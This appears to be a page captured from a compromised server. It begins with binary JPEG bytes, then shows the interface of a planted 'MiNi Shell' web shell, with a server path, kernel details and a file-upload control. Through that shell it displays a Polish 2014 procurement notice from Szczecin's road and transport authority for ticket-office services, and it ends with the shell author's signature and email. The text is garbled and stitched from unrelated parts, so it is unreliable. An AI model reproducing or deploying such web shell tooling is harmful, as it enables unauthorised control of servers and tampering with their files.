JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140109/4621-N-2014.html

<p class="kh_header"><b>Szczecin: Wykoanaie usługi w kasach biletowych ZDiTM</b><br>
<b>Numer ogłoszenia: 4621 - 2014; data zamieszczenia: 09.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 91 4800444,4800434, faks 91 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykoanaie usługi w kasach biletowych ZDiTM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)świadczenie usług w wyznaczonych wcześniej przez Zamawiającego kasach biletowych na terenie miasta Szczecina i Polic (wskazane w rozdziale XIV pkt 6), od  poniedziałku do soboty i w niedzielę oraz w wyznaczone święta w dniach wcześniej wskazanych przez Zamawiającego (w zależności od potrzeb Zamawiającego czas pracy kas biletowych może ulec zmianie),
2)	wykonywanie usługi  w wyznaczonym czasie pomiędzy 05:45-22:00 w zależności od godzin otwarcia kas biletowych. Czas wykonywania usługi w ciągu jednego dnia maksymalnie do 15 godz. Maksymalna ilość godzin wykonywania usługi w czasie trwania niniejszej umowy to 2 149 godzin, 
3)	świadczenie usług w ramach sporządzonego przez Zamawiającego i przedłożonego  Wykonawcy harmonogramu usługi na 5 dni przed rozpoczęciem kolejnego miesiąca. Zamawiający według potrzeb może zmienić w dowolnym momencie harmonogram wykonywania usługi poprzez wprowadzenie czasu mobilnego - 30 procent miesięcznego czasu świadczenia usługi Wykonawcy,
4)	Zamawiający zastrzega sobie prawo do informowania Wykonawcy o zmianie miejsca i czasu wykonywania usługi z wyprzedzeniem jednodniowym lub kilkudniowym lub w nagłych przypadkach w ciągu 24 godzin lecz nie później niż na 1 godzinę przed wykonaniem usługi. Wykonawca będzie informowany o czasie i miejscu wykonywania usługi telefonicznie lub SMS lub email. Forma powiadamiania zostanie uzgodniona z Wykonawcą  przy podpisaniu umowy,
5)	realizacja umowy na urządzeniach i oprogramowaniu będącym własnością Zamawiającego znajdującego się w kasie biletowej,
6)	prowadzenie sprzedaży gotówkowej i bezgotówkowej pełnego asortymentu biletów komunikacji miejskiej (biletów papierowych i elektronicznych) dla klientów  indywidualnych, oraz podmiotów gospodarczych. Sprzedaż biletów  komunikacji miejskiej Ajentom, z którymi  podpisane są umowy na prowadzenie sprzedaży biletów na warunkach wskazanych w  wiążącej obie strony umowie,
7)	wyrabianie blankietów sieciowych i liniowych do biletów okresowych zgodnie z obowiązującymi przepisami  tj. uchwałami Rady Miasta Szczecin, zarządzeniami Dyrektora ZDiTM Szczecin,
8)	wyrabianie biletu elektronicznego, wyrabianie kart SKA (Szczecińska Karta Aglomeracyjna) odpowiednio do potrzeb  pasażera oraz wyrabianie kart SKR  (Szczecińska Karta Rodzinna) zgodnie z przysługującymi ulgami:
wyrabianie biletu elektronicznego przy pomocy urządzeń na stanowisku do  personalizacji,
odpowiednie oznaczenie zgodnie z potrzebami pasażera i obowiązującymi przepisami,   
9)	doładowywanie biletu elektronicznego (kart SKA i SKR) na stanowisku wyposażonym w urządzenia do doładowywania kart (POS) zgodnie z przepisami i posiadanymi przez pasażera uprawnieniami,
10)	wystawianie faktur za zakupione bilety komunikacyjne:
odbiorcom indywidualnym, 
 zakładom pracy,
 Ajentom (zgodnie z zawartą umową pomiędzy Ajentem a ZDiTM Szczecin na prowadzenie sprzedaży biletów).
11)	rzetelne i zgodne z przepisami sporządzanie obowiązującej dokumentacji dotyczącej sprzedaży biletów  i przekazywanie jej do biura Zamawiającego przy ul. Klonowica 5 w Szczecinie:
a)	dzienne: 
meldunek sprzedaży, 
potwierdzenia zapłaty z terminali płatniczych,
raporty z doładowań,
rejestr VAT z doładowań,
kopie wystawionych faktur z danego dnia,
zwrot biletów (bez opłaty manipulacyjnej),
zwrot znaczka,
dokumenty z przesunięć międzymagazynowych MM+,MM-,
b)	miesięczne:
skrócony rejestr dokumentów sprzedaży biletów,
stany ilościowo-wartościowe biletów,raport sprzedaży biletów i doładowań,
raport sprzedaży z doładowań wraz  z rejestrem VAT z całego miesiąca,
sprzedaż z ostatniego dnia świadczenia usługi w danym miesiącu ( meldunek sprzedaży),dodatkowo przesyłanie wszystkich dokumentów MM+, MM-, potwierdzeń wpłat do banku i innych dokumentów wskazanych przez Zamawiającego,                                         
12)zamawianie biletów z głównego magazynu biletowego (systematyczne uzupełnianie asortymentu biletów  wg potrzeb maksymalnie do nieprzekraczalnej kwoty 130 000,00 zł) w godzinach od 07:30 do 15:30 w dni robocze od poniedziałku do piątku. Zamówienie zostanie dostarczone przez kierowcę Zamawiającego (w dniach od poniedziałku do piątku, w godz. od 07:30 do 15:00),Wykonawca odpowiada za utrzymanie ciągłości asortymentu biletów, Zamawiający nie dopuszcza jakiegokolwiek braku nominału w ofercie biletów komunikacji miejskiej.
13)	udzielanie informacji pasażerom w zakresie układu komunikacyjnego, przepisów taryfowych, rodzajów i cen biletów komunikacji miejskiej,
14)	przygotowywanie do odprowadzenia do banku gotówki z dziennego utargu zgodnie z obowiązującymi procedurami w ZDiTM Szczecin,
15)	dokonywanie zwrotów biletów okresowych z poprzedniego miesiąca zgodnie z obowiązującym zarządzeniem Dyrektora (Instrukcją sprzedaży, ewidencji i rozliczania  biletów komunikacji miejskiej oraz opłat za odholowanie pojazdów),
16)	do stałego miejsca wykonywania usługi wykonawca dojeżdża samodzielnie. W przypadku zmiany  miejsca wykonywania usługi Wykonawca będzie przewożony samochodem  Zamawiającego (wraz z powierzonym mieniem) do miejsca wykonywania usługi. 
17)	Wykonawca zobowiązuje się zapewnić realizację zamówienia przez osoby uprawnione do wykonania przedmiotu umowy wskazane w załączniku nr 6 do siwz  (projekt umowy ) § 3 ust. 2. Zmiana osoby wskazanej  w trakcie wykonywania przedmiotu umowy, musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy kwalifikacje proponowanych osób będą takie same lub wyższe od kwalifikacji wymaganych przez Zamawiającego na etapie prowadzonego postępowania w rozdziale V ust. 1 pkt 3) SIWZ.
Wykonawca zobowiązany jest przedłożyć Zamawiającemu propozycję zmiany osoby wskazanej do realizacji usługi, nie później niż 5 dni roboczych przed planowanym dopuszczeniem do udziału w wykonywaniu przedmiotu umowy danej osoby.
4.	Dodatkowy opis stanowiska mobilnego - Część XII:
stanowisko mobilne obowiązuje powyższy zakres prowadzenia obsługi kasowej. Miejsce wykonywania usługi pracownika mobilnego wg potrzeb i wskazań Zamawiającego w kasach biletowych ZDiTM na terenie miasta Szczecina i Polic w godzinach pomiędzy 05:45-22:00.
Wykonawca jest zobowiązany do przemieszczania się z kas biletowych wg potrzeb Zamawiającego. Czas wykonywania usługi w ciągu dnia - maksymalnie do 15 godz., a w roku maksymalnie do 2 149 godzin.
Zamawiający zastrzega sobie prawo do informowania Wykonawcy o zmianie miejsca i czasu wykonywania usługi z wyprzedzeniem jednodniowym lub kilkudniowym lub w nagłych przypadkach w ciągu 24 godzin lecz nie później niż na 1 godzinę przed wykonaniem usługi. Wykonawca będzie informowany o czasie i miejscu wykonywania usługi telefonicznie lub SMS lub email. Forma powiadamiania zostanie uzgodniona z Wykonawcą  przy podpisaniu umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 15 % wartości zamówienia podstawowego ( art. 67 ust.1pkt 6 ustawy Pzp). Zmówienie uzupełniające może zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokunuje opisu sposobu spełniania warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania warunku
Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: minimum jedną główną usługę polegającą na wykonaniu pracy kasjera w obrocie gotówkowym i bezgotówkowym. Okres świadczenia usługi nie może być krótszy niż 6 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokunuje opisu sposobu spełniania warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej jedną osobą, która spełnia poniższe wymagania i kwalifikacje:
a)	umiejętność obsługi komputera, programu operacyjnego Windows, Office, skanera, kserokopiarki;
b)	obsługa terminali płatniczych i kas fiskalnych;
c)	znajomość obowiązującej taryfy i przepisów komunikacji miejskiej obowiązujących w Gminie Miasto Szczecin;
d)	niekaralność za przestępstwo  popełnione umyślnie;
e)	dobry stan zdrowia;
f)	znajomość przepisów BHP i higieny pracy;
g)	dyspozycyjność, komunikatywność, umiejętność pracy w stresie;
h)	doświadczenie w prowadzeniu obrotu gotówkowego, bezgotówkowego środków pieniężnych i fakturowaniu;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokunuje opisu sposobu spełniania warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty wymagające przez zamawiającego:
1)  ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz;	
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)  odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III pkt 1 siwz)
3)   oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom  (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego. ul. Klonowica 5, 71-241 Szczecin
III piętro - pok.305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2014 godzina 09:30, miejsce: Zarząd Dróg i Transportu Miejskiego. ul. Klonowica 5, 71-241 Szczecin
III piętro - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com